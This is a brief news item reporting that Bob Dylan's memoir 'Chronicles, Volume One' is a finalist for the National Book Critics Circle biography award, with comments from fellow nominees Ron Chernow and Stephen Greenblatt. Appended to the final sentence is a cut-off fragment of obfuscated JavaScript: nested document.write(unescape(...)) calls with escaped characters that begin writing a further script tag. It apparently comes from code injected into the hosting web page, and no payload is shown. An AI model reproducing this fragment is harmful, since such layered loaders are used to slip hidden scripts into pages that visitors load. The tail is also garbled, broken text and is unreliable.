Bob Dylan is getting some serious attention from book critics. His autobiography, "Chronicles, Volume One," is among the finalists for the National Book Critics Circle prize in the biography category.
Author Ron Chernow, whose biography of Alexander Hamilton is up against Dylan for that same award, says, "Who can possibly compete with Bob Dylan?" He says the reviews of Dylan's book have been so uniformly interesting that he's not surprised Dylan has been nominated. Author Stephen Greenblatt, another writer who's up for that prize for writing a Shakespeare biography, says he's of Dylan's generation, so it's a thrill. However, he says he never expected to compete with Dylan for an award. The awards will be handed out March 18th.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
